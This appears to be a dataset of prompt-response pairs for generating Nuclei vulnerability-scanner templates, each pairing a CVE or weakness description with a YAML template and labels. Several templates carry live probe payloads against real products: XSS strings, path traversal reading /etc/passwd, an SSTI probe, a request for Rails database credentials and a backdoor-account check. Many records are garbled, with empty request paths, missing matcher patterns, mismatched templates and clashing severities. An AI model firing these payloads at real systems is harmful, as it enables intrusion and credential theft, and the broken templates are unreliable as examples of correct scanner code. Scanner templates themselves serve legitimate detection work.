Vulnerability Type: Vulnerability (CWE-20)
Severity: critical
Affected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware
Indicators: error, vulnerability detected
|
id: cisco-unified-communications-log4j-rce
info:
name: Cisco Unified Communications - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: Cisco Unified Communications is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "dns"
part: interactsh_protocol
- type: regex
part: interactsh_request
|
cve
|
critical
|
CVE-2021-44228
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: sonicwall-analyzer-login
info:
name: SonicWall Analyzer Login Panel - Detect
author: DhiyaneshDK
severity: info
description: SonicWall Analyzer login panel was detected.
tags: panel,sonicwall,discovery
http:
- method: GET
path:
- "{{BaseURL}}/sgms/auth"
matchers:
- type: word
words:
- "SonicWall Analyzer Login"
part: body
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Twig PHP <2.4.4 template engine - SSTI
|
Title: Twig PHP <2.4.4 template engine - SSTI
Summary: Twig PHP <2.4.4 template engine - SSTI. A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: twig-php-ssti
info:
name: Twig PHP <2.4.4 template engine - SSTI
author: madrobot
severity: high
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
tags: php,ssti,twig,vuln
http:
- method: GET
path:
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
matchers:
- type: word
words:
- "1788906"
part: body
- type: status
status:
- 404
|
generic
|
high
|
twig-php-ssti
|
Generate a Nuclei template for: Untangle Exposed Admin Signup
|
Title: Untangle Exposed Admin Signup
Summary: Untangle Exposed Admin Signup. Untangle Exposed Admin Signup is exposed publicly.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: untangle-admin-setup
info:
name: Untangle Exposed Admin Signup
author: ritikchaddha
severity: medium
description: Untangle Exposed Admin Signup is exposed publicly.
tags: misconfig,untangle,admin,setup,vuln
http:
- method: GET
path:
- "{{BaseURL}}/setup/setup.do"
matchers:
- type: word
words:
- "<title>Setup Wizard</title>"
- "java.untangle.com"
part: body
condition: and
- type: status
status:
- 200
|
generic
|
medium
|
untangle-admin-setup
|
Generate a Nuclei template for CVE-2021-32648
|
Title: Authentication Bypass in octobercms october
Summary: octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
Vulnerability Type: Authentication Bypass
Severity: high
Affected Products: octobercms october
Indicators: error, vulnerability detected
|
id: CVE-2021-32648
info:
name: OctoberCMS - Account Takeover
author: daffainfo
severity: high
description: octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
tags: cve,cve2021,cms,octobercms,intrusive,kev,vkev,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
- method: GET
path:
matchers:
- type: dsl
- method: GET
path:
matchers:
- type: dsl
condition: and
- method: GET
path:
matchers:
- type: word
words:
- "october_session="
- "admin_auth="
part: header
condition: and
- type: status
status:
- 302
|
cve
|
high
|
CVE-2021-32648
|
Generate a Nuclei template for: Php Debug Bar - Exposure
|
Title: Php Debug Bar - Exposure
Summary: Php Debug Bar - Exposure. The DebugBar integrates easily into projects and can display profiling data from any part of your application.This template detects exposed PHP Debug Bars by looking for known response bodies and the `phpdebugbar-id` in headers.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: php-debugbar-exposure
info:
name: Php Debug Bar - Exposure
author: ritikchaddha,pdteam,DhiyaneshDk,geeknik
severity: high
description: The DebugBar integrates easily into projects and can display profiling data from any part of your application.This template detects exposed PHP Debug Bars by looking for known response bodies and the `phpdebugbar-id` in headers.
tags: misconfig,php,phpdebug,exposure,debug,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/_debugbar/open"
matchers:
- type: dsl
condition: or
|
generic
|
high
|
php-debugbar-exposure
|
Generate a Nuclei template for: ZyWALL FTP Service - Detect
|
Title: ZyWALL FTP Service - Detect
Summary: ZyWALL FTP Service - Detect. ZyWALL FTP service was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: zywall-ftp-detect
info:
name: ZyWALL FTP Service - Detect
author: pussycat0x
severity: info
description: ZyWALL FTP service was detected.
tags: network,ftp,zywall,detect,firewall,tcp,discovery
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
zywall-ftp-detect
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: reddit
info:
name: Reddit User Name Information - Detect
author: dwisiswant0
severity: info
description: Reddit user name information check was conducted.
tags: osint,osint-social,reddit,discovery
http:
- method: GET
path:
- "https://www.reddit.com/user/{{user}}/about/.json"
matchers:
- type: status
status:
- 200
- type: word
words:
- "total_karma"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: H3C CVM - Arbitrary File Upload
|
Title: H3C CVM - Arbitrary File Upload
Summary: H3C CVM - Arbitrary File Upload. An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
Vulnerability Type: Security Check
Severity: critical
Indicators: vulnerability detected
|
id: h3c-cvm-arbitrary-file-upload
info:
name: H3C CVM - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
tags: h3c,lfi,instrusive,file-upload,intrusive,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "{{payload}}"
part: body_2
- type: word
words:
- "Content-Type: text/html"
part: header
- type: status
status:
- 200
|
generic
|
critical
|
h3c-cvm-arbitrary-file-upload
|
Generate a Nuclei template for CVE-2023-38964
|
Title: Cross-Site Scripting (XSS) in creativeitem academy_lms
Summary: Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: creativeitem academy_lms
Indicators: error, vulnerability detected
|
id: CVE-2023-38964
info:
name: Academy LMS 6.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
tags: cve2023,cve,academylms,xss,creativeitem,vuln
http:
- method: GET
path:
- "{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>"
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2023-38964
|
Generate a Nuclei template for CVE-2022-40843
|
Title: Unknown Vulnerability in tenda w15e_firmware
Summary: The Tenda AC1200 V-W15Ev2 V15.11.0.10(1576) router is vulnerable to improper authorization / improper session management that allows the router login page to be bypassed. This leads to authenticated attackers having the ability to read the routers syslog.log file which contains the MD5 password of the Administrator's user account.
Vulnerability Type: Unknown Vulnerability
Severity: medium
Affected Products: tenda w15e_firmware
Indicators: error, vulnerability detected
|
id: CVE-2022-40843
info:
name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
author: gy741
severity: medium
description: The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
tags: cve2022,cve,tenda,auth-bypass,router,iot,vkev,vuln
http:
- method: GET
path:
matchers:
- type: regex
- type: word
words:
- "[system]"
- "[error]"
- "[wan1]"
part: body
condition: or
- type: word
words:
- "Content-type: config/conf"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2022-40843
|
Generate a Nuclei template for: Niagara Fox Protocol Information Enumeration
|
Title: Niagara Fox Protocol Information Enumeration
Summary: Niagara Fox Protocol Information Enumeration. Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: niagara-fox-info-enum
info:
name: Niagara Fox Protocol Information Enumeration
author: pussycat0x
severity: info
description: Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium.
tags: network,fox,niagara,enum,tcp,discovery
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
niagara-fox-info-enum
|
Generate a Nuclei template for CVE-2023-35161
|
Title: Vulnerability (CWE-87) in xwiki xwiki
Summary: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.2-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
Vulnerability Type: Vulnerability (CWE-87)
Severity: critical
Affected Products: xwiki xwiki
Indicators: error, vulnerability detected
|
id: CVE-2023-35161
info:
name: XWiki >= 6.2-milestone-1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.2-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
tags: cve,cve2023,xwiki,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"
- "{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"
matchers:
- type: word
words:
- "javascript:alert(document.domain)"
- "DeleteApplication"
- "data-xwiki"
part: body
condition: and
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2023-35161
|
Generate a Nuclei template to detect Open Redirect
|
Title: Open Redirect (CWE-601)
Summary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.
Vulnerability Type: Open Redirect
Severity: high
Indicators: vulnerability detected, error
|
id: thinkific-redirect
info:
name: Thinkific - Open Redirect
author: Gal Nagli
severity: medium
description: Thinkific contains an open redirect vulnerability via the http://interact.sh URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
tags: redirect,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh"
matchers:
- type: status
status:
- 302
- type: word
words:
- "<a href="http://interact.sh?kind=jwt&message=Nil+JSON+web+token""
part: body
condition: or
|
cwe
|
high
|
CWE-601
|
Generate a Nuclei template for CVE-2022-24900
|
Title: Path Traversal in piano_led_visualizer_project piano_led_visualizer
Summary: Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack. The `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Since the "malicious" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks. A patch with a fix is available on the `master` branch of the GitHub repository. This can also be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `flask.safe_join` to join untrusted paths or replace `flask.send_file` calls with `flask.send_from_directory` calls.
Vulnerability Type: Path Traversal
Severity: critical
Affected Products: piano_led_visualizer_project piano_led_visualizer
Indicators: error, vulnerability detected
|
id: CVE-2022-24900
info:
name: Piano LED Visualizer 1.3 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.
tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"
matchers:
- type: regex
part: body
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2022-24900
|
Generate a Nuclei template for: GCP Environment Validation
|
Title: GCP Environment Validation
Summary: GCP Environment Validation. Checks if Google Cloud CLI (gcloud) is set up and all necessary tools are installed on the environment.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: gcp-env
info:
name: GCP Environment Validation
author: princechaddha
severity: info
description: Checks if Google Cloud CLI (gcloud) is set up and all necessary tools are installed on the environment.
tags: cloud,devops,google,gcp,gcp-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
gcp-env
|
Generate a Nuclei template for: Unauthenticated Lansweeper Instance
|
Title: Unauthenticated Lansweeper Instance
Summary: Unauthenticated Lansweeper Instance. Lansweeper Instance is exposed.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: unauthenticated-lansweeper
info:
name: Unauthenticated Lansweeper Instance
author: divya_mudgal
severity: high
description: Lansweeper Instance is exposed.
tags: lansweeper,unauth,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}/Default.aspx"
matchers:
- type: word
words:
- "Main page - Lansweeper"
|
generic
|
high
|
unauthenticated-lansweeper
|
Generate a Nuclei template for: Instant Indexing for Google Detection
|
Title: Instant Indexing for Google Detection
Summary: Instant Indexing for Google Detection. Tags: tech, wordpress, wp-plugin
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: wordpress-fast-indexing-api
info:
name: Instant Indexing for Google Detection
author: ricardomaia
severity: info
description: Instant Indexing for Google Detection
tags: tech,wordpress,wp-plugin,top-200,discovery
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt"
matchers:
- type: dsl
- type: regex
part: body
|
generic
|
info
|
wordpress-fast-indexing-api
|
Generate a Nuclei template for: FusionAuth Exposed Admin Setup
|
Title: FusionAuth Exposed Admin Setup
Summary: FusionAuth Exposed Admin Setup. FusionAuth Admin Setup is exposed.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: fusionauth-admin-setup
info:
name: FusionAuth Exposed Admin Setup
author: ritikchaddha
severity: high
description: FusionAuth Admin Setup is exposed.
tags: misconfig,fusionauth,admin,setup,vuln
http:
- method: GET
path:
- "{{BaseURL}}/admin/setup-wizard"
matchers:
- type: word
words:
- "<title>FusionAuth Setup Wizard"
- "FusionAuth is now installed and running"
condition: or
- type: status
status:
- 200
|
generic
|
high
|
fusionauth-admin-setup
|
Generate a Nuclei template for: PowerChute Network Shutdown Panel - Detect
|
Title: PowerChute Network Shutdown Panel - Detect
Summary: PowerChute Network Shutdown Panel - Detect. Tags: panel, login, powerchute
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: powerchute-network-panel
info:
name: PowerChute Network Shutdown Panel - Detect
author: DhiyaneshDK
severity: info
description: PowerChute Network Shutdown Panel - Detect
tags: panel,login,powerchute,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
words:
- "<title>PowerChute Network Shutdown</title>"
part: body
- type: status
status:
- 200
|
generic
|
info
|
powerchute-network-panel
|
Generate a Nuclei template for: Various Online Devices Detection (Network Camera)
|
Title: Various Online Devices Detection (Network Camera)
Summary: Various Online Devices Detection (Network Camera). Network camera panel was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: network-camera-detect
info:
name: Various Online Devices Detection (Network Camera)
author: iamthefrogy
severity: info
description: Network camera panel was detected.
tags: iot,discovery
http:
- method: GET
path:
- "{{BaseURL}}/CgiStart?page=Single"
matchers:
- type: word
words:
- "<TITLE>Network Camera</TITLE>"
|
generic
|
info
|
network-camera-detect
|
Generate a Nuclei template for: Ruby - Privilege Escalation
|
Title: Ruby - Privilege Escalation
Summary: Ruby - Privilege Escalation. Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: privesc-ruby
info:
name: Ruby - Privilege Escalation
author: daffainfo
severity: high
description: Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
tags: code,linux,ruby,privesc,local
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
privesc-ruby
|
Generate a Nuclei template for: KindEditor Security Checks
|
Title: KindEditor Security Checks
Summary: KindEditor Security Checks. A simple workflow that runs all KindEditor related nuclei templates on a given target.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: kindeditor-workflow
info:
name: KindEditor Security Checks
author: daffainfo
severity: info
description: A simple workflow that runs all KindEditor related nuclei templates on a given target.
tags: unknown
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
kindeditor-workflow
|
Generate a Nuclei template for: Detect Springboot Mappings Actuator
|
Title: Detect Springboot Mappings Actuator
Summary: Detect Springboot Mappings Actuator. Additional routes may be displayed
Vulnerability Type: Security Check
Severity: low
Indicators: vulnerability detected
|
id: springboot-mappings
info:
name: Detect Springboot Mappings Actuator
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Additional routes may be displayed
tags: springboot,exposure,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}/mappings"
- "{{BaseURL}}/actuator/mappings"
matchers:
- type: word
words:
- "mappings"
- "method"
- "produces"
part: body
condition: and
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
part: header
condition: or
- type: status
status:
- 200
|
generic
|
low
|
springboot-mappings
|
Generate a Nuclei template for CVE-2021-27856
|
Title: Unknown Vulnerability in fatpipeinc ipvpn_firmware and others
Summary: FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 includes an account named "cmuser" that has administrative privileges and no password. Older versions of FatPipe software may also be vulnerable. The FatPipe advisory identifier for this vulnerability is FPSA002.
Vulnerability Type: Unknown Vulnerability
Severity: critical
Affected Products: fatpipeinc ipvpn_firmware, fatpipeinc mpvpn_firmware, fatpipeinc warp_firmware
Indicators: error, vulnerability detected
|
id: CVE-2021-27856
info:
name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account
author: gy741
severity: critical
description: FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln
http:
- method: GET
path:
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
words:
- ""loginRes":"success""
- ""activeUserName":"cmuser""
condition: and
|
cve
|
critical
|
CVE-2021-27856
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: beyondtrust-panel
info:
name: BeyondTrust Login Panel - Detect
author: r3dg33k,nuk3s3c
severity: info
description: BeyondTrust login panel was detected.
tags: beyondtrust,pam,panel,discovery
http:
- method: GET
path:
- "{{BaseURL}}/WebConsole/"
matchers:
- type: word
words:
- "<title>BeyondInsight</title>"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2023-36845
|
Title: Vulnerability (CWE-473) in juniper junos
Summary: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series
and SRX Series
allows an unauthenticated, network-based attacker to remotely execute code.
Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.
This issue affects Juniper Networks Junos OS on EX Series
and
SRX Series:
* All versions prior to
20.4R3-S9;
* 21.1 versions 21.1R1 and later;
* 21.2 versions prior to 21.2R3-S7;
* 21.3 versions prior to 21.3R3-S5;
* 21.4 versions prior to 21.4R3-S5;
* 22.1 versions
prior to
22.1R3-S4;
* 22.2 versions
prior to
22.2R3-S2;
* 22.3 versions
prior to
22.3R2-S2, 22.3R3-S1;
* 22.4 versions
prior to
22.4R2-S1, 22.4R3;
* 23.2 versions prior to 23.2R1-S1, 23.2R2.
Vulnerability Type: Vulnerability (CWE-473)
Severity: critical
Affected Products: juniper junos
Indicators: error, vulnerability detected
|
id: CVE-2023-36844
info:
name: Juniper Devices - Remote Code Execution
author: princechaddha,ritikchaddha
severity: medium
description: Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- ""original_fileName":"
- ""converted_fileName":"
part: body_2
condition: and
- type: word
words:
- "{{md5(string)}}"
part: body_3
|
cve
|
critical
|
CVE-2023-36845
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: rails-database-config
info:
name: Ruby on Rails Database Configuration File - Detect
author: pdteam,geeknik
severity: high
description: Ruby on Rails database configuration file was detected, which may contain database credentials.
tags: config,exposure,rails,vuln
http:
- method: GET
path:
- "{{BaseURL}}/config/database.yml"
matchers:
- type: word
words:
- "adapter:"
- "database:"
- "production:"
part: body
condition: and
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2018-10738
|
Title: SQL Injection in nagios nagios_xi
Summary: A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
Vulnerability Type: SQL Injection
Severity: high
Affected Products: nagios nagios_xi
Indicators: error, vulnerability detected
|
id: CVE-2018-10738
info:
name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection
author: DhiyaneshDk
severity: high
description: A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
tags: cve,cve2018,nagios,sqli,vuln
http:
- method: POST
path:
- "{{BaseURL}}/nagiosql/admin/menuaccess.php"
matchers:
- type: word
words:
- "{{md5(num)}}"
part: body
|
cve
|
high
|
CVE-2018-10738
|
Generate a Nuclei template for CVE-2025-49844
|
Title: Use After Free in redis redis and others
Summary: Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, trigger a use-after-free and potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.
Vulnerability Type: Use After Free
Severity: critical
Affected Products: redis redis, lfprojects valkey
Indicators: error, vulnerability detected
|
id: CVE-2025-49844
info:
name: Redis Lua Parser < 8.2.2 - Use After Free
author: pussycat0x
severity: critical
description: Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, trigger a use-after-free and potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.
tags: cve,cve2025,js,redis,network,passive,authenticated,vuln
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2025-49844
|
Generate a Nuclei template for CVE-2023-6623
|
Title: Path Traversal in wpdeveloper essential_blocks
Summary: The Essential Blocks WordPress plugin before 4.4.3 does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.
Vulnerability Type: Path Traversal
Severity: critical
Affected Products: wpdeveloper essential_blocks
Indicators: error, vulnerability detected
|
id: CVE-2023-6623
info:
name: Essential Blocks < 4.4.3 - Local File Inclusion
author: iamnoooob,rootxharsh,pdresearch,coldfish
severity: critical
description: Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}"
- "{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"
matchers:
- type: dsl
condition: and
|
cve
|
critical
|
CVE-2023-6623
|
Generate a Nuclei template for: Minimum Administrator Group Membership Check
|
Title: Minimum Administrator Group Membership Check
Summary: Minimum Administrator Group Membership Check. Ensure that only essential accounts are members of the Administrators group. Excess or unnecessary accounts can increase the system's vulnerability to compromise.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: admin-group-minimal
info:
name: Minimum Administrator Group Membership Check
author: nukunga[SungHyunJeon]
severity: medium
description: Ensure that only essential accounts are members of the Administrators group. Excess or unnecessary accounts can increase the system's vulnerability to compromise.
tags: account-management,code,windows-audit,kisa,admin-group
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
admin-group-minimal
|
Generate a Nuclei template for CVE-2021-44228
|
Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others
Summary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Vulnerability Type: Vulnerability (CWE-20)
Severity: critical
Affected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware
Indicators: error, vulnerability detected
|
id: splunk-enterprise-log4j-rce
info:
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "dns"
part: interactsh_protocol
- type: regex
part: interactsh_request
|
cve
|
critical
|
CVE-2021-44228
|
Generate a Nuclei template for CVE-2024-31982
|
Title: Vulnerability (CWE-95) in xwiki xwiki
